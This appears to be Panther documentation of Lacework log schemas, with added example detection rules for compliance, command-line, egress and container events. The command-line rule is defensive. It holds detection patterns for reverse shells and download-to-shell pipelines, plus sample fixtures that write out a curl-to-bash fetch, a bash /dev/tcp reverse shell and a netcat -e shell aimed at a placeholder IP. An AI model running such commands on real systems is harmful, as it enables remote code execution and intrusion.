Lacework Logs
Connecting Lacework logs to your Panther Console
Panther supports ingesting Lacework logs via common Data Transport options: Amazon Web Services (AWS) S3 and SQS.
To connect these logs into Panther:
1. Log in to the Panther Console.
2. In the left sidebar, click Configure > Log Sources.
3. Click Create New.
4. Search for the log type you want to onboard, then click its tile.
5. Select the data transport method you wish to use for this integration (S3 or SQS), then follow Panther's instructions for configuring that method.
6. Configure Lacework to push logs to the Data Transport source. See Lacework's documentation for instructions on pushing logs to your selected Data Transport source.
Required fields in the schema are listed as "required: true" just below the "name" field.
Lacework.AgentManagement gathers Lacework agent management information.
fields:
  - name: AGENT_VERSION
    required: true
    type: string
  - name: CREATED_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: HOSTNAME
    required: true
    type: string
  - name: IP_ADDR
    required: true
    type: string
    indicators:
      - ip
  - name: LAST_UPDATE
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
  - name: MID
    required: true
    type: bigint
  - name: MODE
    required: true
    type: string
  - name: OS
    required: true
    type: string
  - name: STATUS
    required: true
    type: string
  - name: TAGS
    type: json
Lacework.AlertDetails provides information about generated alerts.
fields:
  - name: END_TIME
    required: true
    type: timestamp
    timeFormats:
      - '%a, %d %b %Y %H:%M:%S %z'
      - '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: ENTITY_MAP
    required: true
    type: object
    fields:
      - name: NewViolation
        type: array
        element:
          type: object
          fields:
            - name: KEY
              type: object
              fields:
                - name: reason
                  type: string
                - name: reason_id
                  type: string
                - name: rec_id
                  type: string
                - name: resource
                  type: string
                  indicators:
                    - aws_arn
            - name: PROPS
              type: json
      - name: RecId
        type: array
        element:
          type: object
          fields:
            - name: KEY
              type: object
              fields:
                - name: eval_guid
                  type: string
                - name: rec_id
                  type: string
            - name: PROPS
              type: json
      - name: Resource
        type: array
        element:
          type: object
          fields:
            - name: KEY
              type: object
              fields:
                - name: name
                  type: string
                - name: value
                  type: string
                  indicators:
                    - aws_arn
      - name: ViolationReason
        type: array
        element:
          type: object
          fields:
            - name: KEY
              type: object
              fields:
                - name: reason
                  type: string
                - name: reason_id
                  type: string
                - name: rec_id
                  type: string
            - name: PROPS
              type: json
  - name: EVENT_ACTOR
    required: true
    type: string
  - name: EVENT_ID
    required: true
    type: bigint
  - name: EVENT_MODEL
    required: true
    type: string
  - name: EVENT_TYPE
    required: true
    type: string
  - name: START_TIME
    required: true
    type: timestamp
    timeFormats:
      - '%a, %d %b %Y %H:%M:%S %z'
      - '%Y-%m-%d %H:%M:%S.%f'
Lacework.AllFiles tracks every time Lacework detects a file.
fields:
  - name: CREATED_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: FILEDATA_HASH
    required: true
    type: string
    indicators:
      - sha256
  - name: FILE_PATH
    required: true
    type: string
  - name: MID
    required: true
    type: bigint
  - name: MTIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
  - name: SIZE
    required: true
    type: bigint
Lacework.Applications contains information about applications running on machines with a Lacework agent installed, with details such as the application name, user name and machine.
fields:
  - name: APP_NAME
    required: true
    description: The application name detected by the Lacework agent installed on the machine.
    type: string
  - name: CONTAINER_INFO
    description: The container info provides details about the container where the application is running.
    type: json
  - name: END_TIME
    required: true
    description: The time and date when the hourly aggregation time period ends.
    type: timestamp
    timeFormats:
      - '%a, %d %b %Y %H:%M:%S %z'
      - '%Y-%m-%d %H:%M:%S.%f'
  - name: EXE_PATH
    required: true
    description: The executable path for the detected application.
    type: string
  - name: MID
    description: The Lacework-generated machine identifier that uniquely identifies the machine.
    type: bigint
  - name: NET_STATS
    description: The network stats about the application including the number of bytes in and out of the network.
    type: json
  - name: PROPS_MACHINE
    description: The machine properties such as host name, ip address, machine tags, etc.
    type: object
    fields:
      - name: hostname
        description: hostname
        type: string
        indicators:
          - hostname
      - name: ip_addr
        description: ip_addr
        type: string
        indicators:
          - ip
      - name: mem_kbytes
        description: mem_kbytes
        type: bigint
      - name: num_users
        description: num_users
        type: bigint
      - name: primary_tags
        description: primary_tags
        type: json
      - name: tags
        description: tags
        type: json
      - name: up_time
        description: up_time
        type: bigint
  - name: START_TIME
    required: true
    description: The time and date when the hourly aggregation time period starts.
    type: timestamp
    timeFormats:
      - '%a, %d %b %Y %H:%M:%S %z'
      - '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: USERNAME
    description: The username running the application on the machine.
    type: object
    fields:
      - name: effective
        description: effective
        type: string
        indicators:
          - username
      - name: original
        description: original
        type: string
        indicators:
          - username
Lacework.ChangeFiles tracks every time a file is changed in your environment.
fields:
  - name: END_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: FILEDATA_HASH
    required: true
    type: string
    indicators:
      - sha256
  - name: FILE_PATH
    required: true
    type: string
  - name: MID
    required: true
    type: bigint
  - name: MTIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
  - name: SIZE
    required: true
    type: bigint
  - name: START_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
Lacework.CloudCompliance tracks compliance violations identified by Lacework cloud assessments.
fields:
  - name: REASON
    type: string
  - name: REGION
    type: string
  - name: RESOURCE
    type: string
    indicators:
      - aws_arn
  - name: ACCOUNT
    required: true
    type: object
    fields:
      - name: AccountId
        type: string
        indicators:
          - aws_account_id
      - name: Account_Alias
        type: string
  - name: EVAL_TYPE
    required: true
    type: string
  - name: ID
    required: true
    type: string
  - name: RECOMMENDATION
    type: string
  - name: REPORT_TIME
    required: true
    type: timestamp
    timeFormats:
      - '%Y-%m-%d %H:%M:%S.%f'
      - '%a, %d %b %Y %H:%M:%S %z'
    isEventTime: true
  - name: SECTION
    type: string
  - name: SEVERITY
    required: true
    type: string
  - name: STATUS
    required: true
    type: string
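Once Lacework.CloudCompliance events are flowing, the obvious first detection is "a high-severity check is failing". The following is an added example written for this page, not Panther's or Lacework's own code. It uses the function names a Panther Python rule exposes (rule, title, dedup, severity, alert_context) but runs stand-alone on plain dicts. Two things are assumptions rather than facts taken from the schema: that a failing check arrives with STATUS equal to "NonCompliant", and that SEVERITY is the string "1" (most severe) through "5" (least severe). The sample events are constructed.

```python
"""Added example: a Panther-style rule over Lacework.CloudCompliance events.

Illustrative code, not Panther's or Lacework's own. It follows the function
names a Panther Python rule uses (rule, title, dedup, severity, alert_context)
and receives a dict-like event, but runs stand-alone on plain dicts.
"""

# Assumption: Lacework reports a failing check with STATUS == "NonCompliant".
NONCOMPLIANT_STATUS = "NonCompliant"

# Assumption: Lacework encodes SEVERITY as the strings "1" (critical) .. "5" (info).
LACEWORK_TO_PANTHER_SEVERITY = {
    "1": "CRITICAL",
    "2": "HIGH",
    "3": "MEDIUM",
    "4": "LOW",
    "5": "INFO",
}

# Only alert on the two most severe tiers; lower tiers still land in the data lake
# and can be reviewed with a scheduled query instead of paging someone.
ALERTING_SEVERITIES = frozenset({"1", "2"})


def account_id(event):
    """ACCOUNT is required in the schema, but its AccountId sub-field is not."""
    return (event.get("ACCOUNT") or {}).get("AccountId") or "<unknown account>"


def rule(event):
    """Fire on failing checks in the alerting severity tiers."""
    if event.get("STATUS") != NONCOMPLIANT_STATUS:
        return False
    return str(event.get("SEVERITY", "")) in ALERTING_SEVERITIES


def severity(event):
    """Translate Lacework's numeric severity into a Panther severity name."""
    return LACEWORK_TO_PANTHER_SEVERITY.get(str(event.get("SEVERITY", "")), "MEDIUM")


def title(event):
    return (
        f"Lacework {event.get('EVAL_TYPE', 'compliance')} check "
        f"{event.get('ID', '<no id>')} failing on "
        f"{event.get('RESOURCE', '<no resource>')} in account {account_id(event)}"
    )


def dedup(event):
    """Group repeated evaluations of the same finding into one alert.

    Lacework re-evaluates every resource on each assessment run, so keying on
    (account, check ID, resource) keeps a persistent misconfiguration from
    re-paging on every report.
    """
    return f"{account_id(event)}:{event.get('ID', '')}:{event.get('RESOURCE', '')}"


def alert_context(event):
    """What a responder needs without opening the Lacework console."""
    return {
        "reason": event.get("REASON"),
        "recommendation": event.get("RECOMMENDATION"),
        "region": event.get("REGION"),
        "section": event.get("SECTION"),
        "report_time": event.get("REPORT_TIME"),
    }


# Constructed sample events in the Lacework.CloudCompliance schema (not real data).
SAMPLE_ROOT_NO_MFA = {
    "ACCOUNT": {"AccountId": "123456789012", "Account_Alias": "prod"},
    "EVAL_TYPE": "AWS_CIS_S3",
    "ID": "AWS_CIS_1_13",
    "REASON": "MFA is not enabled for the root account",
    "RECOMMENDATION": "Ensure MFA is enabled for the root account",
    "REGION": "global",
    "REPORT_TIME": "2024-01-15 08:00:00.000",
    "RESOURCE": "arn:aws:iam::123456789012:root",
    "SECTION": "Identity and Access Management",
    "SEVERITY": "1",
    "STATUS": "NonCompliant",
}
SAMPLE_COMPLIANT = dict(SAMPLE_ROOT_NO_MFA, STATUS="Compliant")
SAMPLE_LOW_SEVERITY = dict(SAMPLE_ROOT_NO_MFA, ID="AWS_CIS_2_6", SEVERITY="4")
SAMPLE_NO_ACCOUNT_ID = dict(SAMPLE_ROOT_NO_MFA, ACCOUNT={"Account_Alias": "prod"})

if __name__ == "__main__":
    for evt in (SAMPLE_ROOT_NO_MFA, SAMPLE_COMPLIANT, SAMPLE_LOW_SEVERITY, SAMPLE_NO_ACCOUNT_ID):
        print(rule(evt), severity(evt), dedup(evt))
```

The dedup key is the part worth copying: Lacework re-reports unchanged findings on every assessment, so an alert keyed on the event's timestamp would fire hourly for the same root account without MFA.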
Lacework.CloudConfiguration contains details about supported and configured cloud resources.
fields:
  - name: START_TIME
    required: true
    description: The time and date when the hourly aggregation time period starts.
    type: timestamp
    timeFormats:
      - '%a, %d %b %Y %H:%M:%S %z'
      - '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: END_TIME
    required: true
    description: The time and date when the hourly aggregation time period ends.
    type: timestamp
    timeFormats:
      - '%a, %d %b %Y %H:%M:%S %z'
      - '%Y-%m-%d %H:%M:%S.%f'
  - name: URN
    required: true
    description: URN of the resource.
    type: string
    indicators:
      - aws_arn
  - name: SERVICE
    description: The service that the resource belongs to.
    type: string
  - name: STATUS
    description: The status of the resource.
    type: json
  - name: CLOUD_DETAILS
    description: Cloud details.
    type: json
  - name: RESOURCE_TYPE
    description: The resource type.
    type: string
  - name: RESOURCE_ID
    required: true
    description: The ID of the resource.
    type: string
  - name: RESOURCE_REGION
    description: The region that the resource belongs to.
    type: string
  - name: RESOURCE_CONFIG
    description: The configuration of the resource.
    type: json
  - name: RESOURCE_TAGS
    description: The tags associated with the resource.
    type: json
  - name: CSP
    description: The cloud provider.
    type: string
  - name: API_KEY
    description: The key describing the API used to fetch data for the resource.
    type: string
Lacework.Cmdline monitors any command line invocations in your environment.
fields:
  - name: CMDLINE
    required: true
    type: string
  - name: CMDLINE_HASH
    required: true
    type: string
    indicators:
      - md5
  - name: CREATED_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
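Lacework.Cmdline carries only three fields, so a detection on it is pattern matching over CMDLINE plus sensible grouping on CMDLINE_HASH. The following is an added example for this page, not Panther's or Lacework's code: a Panther-style rule (rule, title, dedup, alert_context) that flags download-and-execute pipelines and inline reverse-shell idioms. The patterns and the sample command lines are constructed for the example; the hash values are placeholders, not real MD5 digests.

```python
"""Added example: a Panther-style rule over Lacework.Cmdline events that flags
download-and-execute and reverse-shell command lines. Illustrative code, not
Panther's or Lacework's own; it runs stand-alone on plain dicts.

Dedup keys on CMDLINE_HASH (the MD5 Lacework records for the command line), so
the same command replayed across a fleet yields one alert, not one per host.
"""
import re

# Each pattern is paired with a short label that ends up in the alert title.
SUSPICIOUS_PATTERNS = [
    # curl/wget output piped straight into a shell
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
     "download piped to shell"),
    # curl/wget output piped into a scripting interpreter
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(python3?|perl)\b"),
     "download piped to interpreter"),
    # base64-decoded payload executed in place
    (re.compile(r"base64\s+(-d|--decode)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
     "base64 payload piped to shell"),
    # bash's /dev/tcp pseudo-device used to open a socket (classic reverse shell)
    (re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"),
     "bash /dev/tcp connection"),
    # netcat executing a program on connect
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s*/"),
     "netcat -e"),
]


def matched_labels(cmdline):
    """Return the labels of every pattern that matches; empty list if none."""
    return [label for pattern, label in SUSPICIOUS_PATTERNS if pattern.search(cmdline)]


def rule(event):
    # CMDLINE is required in the schema, but guard against None anyway.
    return bool(matched_labels(event.get("CMDLINE") or ""))


def title(event):
    labels = ", ".join(matched_labels(event.get("CMDLINE") or ""))
    return f"Suspicious command line ({labels}) at {event.get('CREATED_TIME', '<no time>')}"


def dedup(event):
    # Prefer the hash; fall back to a prefix of the raw text if it is missing.
    return event.get("CMDLINE_HASH") or (event.get("CMDLINE") or "")[:200]


def alert_context(event):
    return {
        "cmdline": event.get("CMDLINE"),
        "cmdline_hash": event.get("CMDLINE_HASH"),
        "created_time": event.get("CREATED_TIME"),
    }


# Constructed sample events (not real data); hashes are placeholders, not real MD5s.
def sample(cmdline, hash_placeholder):
    return {"CMDLINE": cmdline, "CMDLINE_HASH": hash_placeholder,
            "CREATED_TIME": "2024-01-15 10:00:00.000"}

SAMPLE_CURL_SH = sample("curl -fsSL http://203.0.113.9/x.sh | bash", "md5-placeholder-1")
SAMPLE_DEV_TCP = sample("bash -i >& /dev/tcp/203.0.113.9/4444 0>&1", "md5-placeholder-2")
SAMPLE_BASE64 = sample("echo aWQ= | base64 -d | sh", "md5-placeholder-3")
SAMPLE_NC = sample("nc 203.0.113.9 4444 -e /bin/sh", "md5-placeholder-4")
SAMPLE_BENIGN_CURL = sample("curl -fsSL https://example.com/health -o /tmp/health.json", "md5-placeholder-5")
SAMPLE_BENIGN_PIPE = sample("cat /var/log/syslog | grep sshd", "md5-placeholder-6")

if __name__ == "__main__":
    for evt in (SAMPLE_CURL_SH, SAMPLE_DEV_TCP, SAMPLE_BASE64, SAMPLE_NC,
                SAMPLE_BENIGN_CURL, SAMPLE_BENIGN_PIPE):
        print(rule(evt), matched_labels(evt["CMDLINE"]))
```

Keep the `[^|;&]*` segments: they stop a `curl` early in a long compound command from pairing with a `sh` several pipes later, which is where most false positives on build hosts come from.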
Lacework.Connections monitors for connections in your environment.
fields:
  - name: DST_ENTITY_ID
    required: true
    type: object
    fields:
      - name: pid_hash
        type: string
      - name: port
        type: bigint
      - name: protocol
        type: string
      - name: mid
        type: bigint
  - name: DST_ENTITY_TYPE
    required: true
    type: string
  - name: DST_IN_BYTES
    required: true
    type: bigint
  - name: DST_OUT_BYTES
    required: true
    type: bigint
  - name: ENDPOINT_DETAILS
    required: true
    type: array
    element:
      type: object
      fields:
        - name: dst_ip_addr
          required: true
          type: string
          indicators:
            - ip
        - name: dst_port
          required: true
          type: bigint
        - name: protocol
          required: true
          type: string
        - name: src_ip_addr
          required: true
          type: string
          indicators:
            - ip
  - name: END_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: NUM_CONNS
    required: true
    type: bigint
  - name: SRC_ENTITY_ID
    required: true
    type: object
    fields:
      - name: mid
        required: true
        type: bigint
      - name: pid_hash
        required: true
        type: string
  - name: SRC_ENTITY_TYPE
    required: true
    type: string
  - name: SRC_IN_BYTES
    required: true
    type: bigint
  - name: SRC_OUT_BYTES
    required: true
    type: bigint
  - name: START_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
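The ENDPOINT_DETAILS array is what makes Lacework.Connections useful for egress monitoring: each element is a (src, dst, port, protocol) tuple aggregated into the record. The following is an added example for this page, not Panther's or Lacework's code: a Panther-style rule that flags connections from a monitored machine to a globally routable IP on a port outside an expected egress set, using Python's ipaddress module to separate public from private destinations. Assumptions, labelled in the code: SRC_ENTITY_TYPE is "Machine" when the agent-side endpoint is the source, and the expected-port set and byte-ratio severity heuristic are the example's own. Sample events are constructed.

```python
"""Added example: a Panther-style rule over Lacework.Connections events that flags
outbound connections to public IPs on unexpected ports. Illustrative code, not
Panther's or Lacework's own; runs stand-alone on plain dicts shaped like the schema.
"""
import ipaddress

# Assumption: ports an internal workload is expected to reach on the public internet.
EXPECTED_EGRESS_PORTS = frozenset({53, 80, 123, 443})

# Assumption: Lacework labels the agent-side source entity "Machine".
MACHINE_ENTITY_TYPE = "Machine"


def is_public_ip(ip_text):
    """True for globally routable addresses.

    Private, loopback, link-local, documentation ranges and unparsable strings all
    return False, so a malformed field produces silence rather than a false alert.
    """
    try:
        return ipaddress.ip_address(ip_text).is_global
    except ValueError:
        return False


def unexpected_egress(event):
    """(dst_ip, dst_port, protocol) tuples that leave to a public IP on an unexpected port."""
    found = []
    for endpoint in event.get("ENDPOINT_DETAILS") or []:
        dst_ip = endpoint.get("dst_ip_addr") or ""
        port = endpoint.get("dst_port")
        if is_public_ip(dst_ip) and port not in EXPECTED_EGRESS_PORTS:
            found.append((dst_ip, port, endpoint.get("protocol")))
    return found


def rule(event):
    if event.get("SRC_ENTITY_TYPE") != MACHINE_ENTITY_TYPE:
        return False
    return bool(unexpected_egress(event))


def title(event):
    dsts = ", ".join(f"{ip}:{port}/{proto}" for ip, port, proto in unexpected_egress(event))
    mid = (event.get("SRC_ENTITY_ID") or {}).get("mid", "?")
    return f"Machine {mid} made {event.get('NUM_CONNS', '?')} connection(s) to unexpected egress {dsts}"


def dedup(event):
    """One alert per (machine, sorted destination set) across hourly windows."""
    mid = (event.get("SRC_ENTITY_ID") or {}).get("mid", "")
    dsts = sorted(f"{ip}:{port}" for ip, port, _ in unexpected_egress(event))
    return f"{mid}:" + ",".join(dsts)


def severity(event):
    # Heuristic: source bytes out dwarfing bytes in looks like upload/exfil rather
    # than a download, so escalate.
    out_bytes = event.get("SRC_OUT_BYTES") or 0
    in_bytes = event.get("SRC_IN_BYTES") or 0
    return "HIGH" if out_bytes > 10 * max(in_bytes, 1) else "MEDIUM"


# Constructed sample events (not real data), trimmed to the fields the rule reads.
# 1.2.3.4 is used purely as a placeholder for a globally routable address.
def sample(src_type, dst_ip, dst_port, out_bytes, in_bytes):
    return {
        "SRC_ENTITY_TYPE": src_type,
        "SRC_ENTITY_ID": {"mid": 7, "pid_hash": "pid-hash-placeholder"},
        "DST_ENTITY_TYPE": "External",
        "DST_ENTITY_ID": {"port": dst_port, "protocol": "TCP"},
        "ENDPOINT_DETAILS": [{"src_ip_addr": "10.0.1.5", "dst_ip_addr": dst_ip,
                              "dst_port": dst_port, "protocol": "TCP"}],
        "NUM_CONNS": 3,
        "SRC_OUT_BYTES": out_bytes, "SRC_IN_BYTES": in_bytes,
        "DST_OUT_BYTES": in_bytes, "DST_IN_BYTES": out_bytes,
        "START_TIME": "2024-01-15 11:00:00.000", "END_TIME": "2024-01-15 12:00:00.000",
    }

SAMPLE_EXFIL = sample("Machine", "1.2.3.4", 4444, 5_000_000, 12_000)
SAMPLE_HTTPS = sample("Machine", "1.2.3.4", 443, 20_000, 900_000)
SAMPLE_INTERNAL = sample("Machine", "10.0.2.9", 5432, 40_000, 40_000)
SAMPLE_NOT_MACHINE = sample("External", "1.2.3.4", 4444, 5_000_000, 12_000)

if __name__ == "__main__":
    for evt in (SAMPLE_EXFIL, SAMPLE_HTTPS, SAMPLE_INTERNAL, SAMPLE_NOT_MACHINE):
        print(rule(evt), severity(evt), dedup(evt))
```

Note that Python's ipaddress treats the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) as non-global, so test fixtures built from those addresses will never trigger this rule; that is why the sample uses a different placeholder.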
Lacework.ContainerSummary monitors for containers in your environment.
fields:
  - name: POD_NAME
    type: string
  - name: CONTAINER_NAME
    required: true
    type: string
  - name: END_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: IMAGE_ID
    required: true
    type: string
  - name: MID
    required: true
    type: bigint
  - name: PROPS_CONTAINER
    required: true
    type: object
    fields:
      - name: VOLUME_MAP
        type: json
      - name: POD_IP_ADDR
        type: string
        indicators:
          - ip
      - name: LISTEN_PORT_MAP
        type: json
      - name: POD_TYPE
        type: string
      - name: PROPS_LABEL
        type: json
      - name: CONTAINER_START_TIME
        required: true
        type: timestamp
        timeFormat: unix_ms
      - name: CONTAINER_TYPE
        required: true
        type: string
      - name: IMAGE_AUTHOR
        required: true
        type: string
      - name: IMAGE_CREATED_TIME
        required: true
        type: timestamp
        timeFormat: unix_ms
      - name: IMAGE_ID
        required: true
        type: string
      - name: IMAGE_PARENT_ID
        required: true
        type: string
      - name: IMAGE_REPO
        required: true
        type: string
      - name: IMAGE_SIZE
        required: true
        type: bigint
      - name: IMAGE_TAG
        required: true
        type: string
      - name: IMAGE_VERSION
        required: true
        type: string
      - name: IMAGE_VIRTUAL_SIZE
        required: true
        type: bigint
      - name: IPV4
        required: true
        type: string
        indicators:
          - ip
      - name: NAME
        required: true
        type: string
      - name: NETWORK_MODE
        required: true
        type: string
      - name: PID_MODE
        required: true
        type: string
      - name: PRIVILEGED
        required: true
        type: bigint
  - name: START_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
  - name: TAGS
    required: true
    type: json
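PROPS_CONTAINER carries the three fields that decide how much of the host a container can reach: PRIVILEGED, PID_MODE and NETWORK_MODE. The following is an added example for this page, not Panther's or Lacework's code: a Panther-style rule that alerts on containers running privileged or sharing a host namespace, with a repository-level allowlist for images that legitimately need that access. Assumptions, labelled in the code: PRIVILEGED is 1 for a privileged container and 0 otherwise, PID_MODE and NETWORK_MODE carry Docker's literal "host" value when the namespace is shared, and the allowlisted repositories (including the Lacework agent image, which is assumed to need host access) are the example's own. Sample events are constructed.

```python
"""Added example: a Panther-style rule over Lacework.ContainerSummary events that
flags privileged containers and containers sharing the host PID or network
namespace. Illustrative code, not Panther's or Lacework's own; runs stand-alone
on plain dicts shaped like the schema above.
"""

# Assumption: image repositories that legitimately need host access. Matching on
# the repository rather than repo:tag means a tag bump does not reopen the exception.
ALLOWED_HOST_ACCESS_REPOS = frozenset({
    "lacework/datacollector",        # assumed: the Lacework agent container itself
    "example.internal/cni-plugin",   # hypothetical in-house CNI image
})


def props(event):
    """PROPS_CONTAINER is required, but guard against a null object anyway."""
    return event.get("PROPS_CONTAINER") or {}


def host_access_reasons(event):
    """Return the list of ways this container exceeds normal isolation."""
    container = props(event)
    reasons = []
    # Assumption: PRIVILEGED is a 0/1 bigint; any non-zero value counts as privileged.
    if container.get("PRIVILEGED"):
        reasons.append("privileged")
    # Assumption: Docker reports host namespace sharing as the literal string "host".
    if container.get("PID_MODE") == "host":
        reasons.append("host PID namespace")
    if container.get("NETWORK_MODE") == "host":
        reasons.append("host network namespace")
    return reasons


def rule(event):
    if props(event).get("IMAGE_REPO") in ALLOWED_HOST_ACCESS_REPOS:
        return False
    return bool(host_access_reasons(event))


def title(event):
    container = props(event)
    image = f"{container.get('IMAGE_REPO', '<unknown repo>')}:{container.get('IMAGE_TAG', '<no tag>')}"
    return (
        f"Container {event.get('CONTAINER_NAME', '<unnamed>')} ({image}) on machine "
        f"{event.get('MID', '?')} has {', '.join(host_access_reasons(event))}"
    )


def dedup(event):
    """One alert per (machine, image repo, reason set); the hourly summary for the
    same long-running container should not re-alert."""
    return f"{event.get('MID')}:{props(event).get('IMAGE_REPO')}:{'+'.join(host_access_reasons(event))}"


def severity(event):
    # Privileged is effectively root on the host; namespace sharing alone is less so.
    return "HIGH" if "privileged" in host_access_reasons(event) else "MEDIUM"


# Constructed sample events (not real data), trimmed to the fields the rule reads.
def sample(name, repo, tag, privileged, pid_mode, net_mode):
    return {
        "CONTAINER_NAME": name,
        "MID": 42,
        "IMAGE_ID": "sha256:0123456789abcdef",
        "END_TIME": "2024-01-15 09:00:00.000",
        "PROPS_CONTAINER": {
            "IMAGE_REPO": repo,
            "IMAGE_TAG": tag,
            "PRIVILEGED": privileged,
            "PID_MODE": pid_mode,
            "NETWORK_MODE": net_mode,
            "NAME": name,
        },
    }

SAMPLE_PRIVILEGED = sample("debug-shell", "example.internal/busybox", "latest", 1, "", "bridge")
SAMPLE_HOST_PID = sample("profiler", "example.internal/profiler", "v2", 0, "host", "bridge")
SAMPLE_NORMAL = sample("web", "example.internal/web", "1.4.2", 0, "", "bridge")
SAMPLE_ALLOWED = sample("lacework", "lacework/datacollector", "6.3", 1, "host", "host")

if __name__ == "__main__":
    for evt in (SAMPLE_PRIVILEGED, SAMPLE_HOST_PID, SAMPLE_NORMAL, SAMPLE_ALLOWED):
        print(rule(evt), severity(evt), dedup(evt))
```

Because ContainerSummary is an hourly aggregate rather than a start event, the dedup key deliberately omits START_TIME; otherwise a long-lived privileged container pages once an hour for as long as it runs.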
Lacework.ContainerVulnDetails monitors for container vulnerabilities in your environment.
fields:
  - name: SEVERITY
    type: string
  - name: VULN_ID
    type: string
  - name: EVAL_CTX
    required: true
    type: object
    fields:
      - name: cve_batch_info
        required: true
        type: array
        element:
          type: object
          fields:
            - name: cve_batch_id
              required: true
              type: string
            - name: cve_created_time
              required: true
              type: timestamp
              timeFormat: '%Y-%m-%d %H:%M:%S.%f000'
      - name: image_info
        required: true
        type: object
        fields:
          - name: created_time
            required: true
            type: timestamp
            timeFormat: unix_ms
          - name: digest
            required: true
            type: string
          - name: id
            required: true
            type: string
          - name: registry
            required: true
            type: string
          - name: repo
            required: true
            type: string
          - name: scan_created_time
            required: true
            type: timestamp
            timeFormat: unix
          - name: size
            required: true
            type: bigint
          - name: status
            required: true
            type: string
          - name: tags
            required: true
            type: array
            element:
              type: string
          - name: type
            required: true
            type: string
      - name: integration_props
        required: true
        type: object
        fields:
          - name: INTG_GUID
            type: string
          - name: NAME
            type: string
          - name: REGISTRY_TYPE
            type: string
      - name: is_reeval
        required: true
        type: boolean
      - name: request_source
        required: true
        type: string
      - name: scan_batch_id
        required: true
        type: string
      - name: scan_request_props
        required: true
        type: object
        fields:
          - name: reqId
            type: string
          - name: data_format_version
            required: true
            type: string
          - name: props
            required: true
            type: object
            fields:
              - name: data_format_version
                required: true
                type: string
              - name: scanner_version
                required: true
                type: string
          - name: scanCompletionUtcTime
            required: true
            type: timestamp
            timeFormat: unix
          - name: scan_start_time
            required: true
            type: timestamp
            timeFormat: unix
          - name: scanner_version
            required: true
            type: string
      - name: vuln_batch_id
        required: true
        type: string
      - name: vuln_created_time
        required: true
        type: timestamp
        timeFormat: '%Y-%m-%d %H:%M:%S.%f000'
  - name: FEATURE_KEY
    required: true
    type: object
    fields:
      - name: name
        required: true
        type: string
      - name: namespace
        required: true
        type: string
      - name: version
        required: true
        type: string
  - name: FEATURE_PROPS
    required: true
    type: object
    fields:
      - name: introduced_in
        required: true
        type: string
      - name: layer
        required: true
        type: string
      - name: src
        required: true
        type: string
      - name: version_format
        required: true
        type: string
  - name: FIX_INFO
    required: true
    type: object
    fields:
      - name: compare_result
        required: true
        type: string
      - name: fix_available
        required: true
        type: string
      - name: fixed_version
        required: true
        type: string
  - name: IMAGE_ID
    required: true
    type: string
  - name: START_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: STATUS
    required: true
    type: string
Lacework.DNSQuery monitors for any DNS queries in your environment.
fields:
  - name: CREATED_TIME
    required: true
    type: timestamp
    timeFormat: '%Y-%m-%d %H:%M:%S.%f'
    isEventTime: true
  - name: DNS_SERVER_IP
    required: true
    type: string
    indicators:
      - ip
  - name: FQDN
    required: true
    type: string
    indicators:
      - domain
  - name: HOST_IP_ADDR
    required: true
    type: string
    indicators:
      - ip
  - name: MID
    required: true
    type: bigint
  - name: TTL
    required: true
    type: bigint
Lacework.Events represents the content of an exported Lacework Alert S3 Object.
fields:
  - name: EVENT_CATEGORY
    required: true
    description: The category the event falls into
    type: string
  - name: EVENT_DETAILS
    required: true
    description: The event details
    type: object
    fields:
      - name: data
        description: The array of event data
        type: array
        element:
          type: object
          fields:
            - name: START_TIME
              description: The event start time.
              type: timestamp
              timeFormat: rfc3339
            - name: END_TIME
              description: The event end time.
              type: timestamp
              timeFormat: rfc3339
            - name: EVENT_TYPE
              description: The event type description, e.g. launched new binary.
              type: string
            - name: EVENT_ID
              description: The event alert ID.
              type: string
            - name: EVENT_ACTOR
              description: The origin of the event, e.g. AWS, User.
              type: string
            - name: EVENT_MODEL
              description: The model that triggered an alert.
              type: string
            - name: ENTITY_MAP
              description: The map of fields related to the detection alert.
              type: object
              fields:
                - name: User
                  description: Any user-based info involved in an alert.
                  type: array
                  element:
                    type: object
                    fields:
                      - name: MACHINE_HOSTNAME
                        description: Hostname field
                        type: string
                      - name: USERNAME
                        description: Username field
                        type: string
                        indicators:
                          - username
                - name: Application
                  description: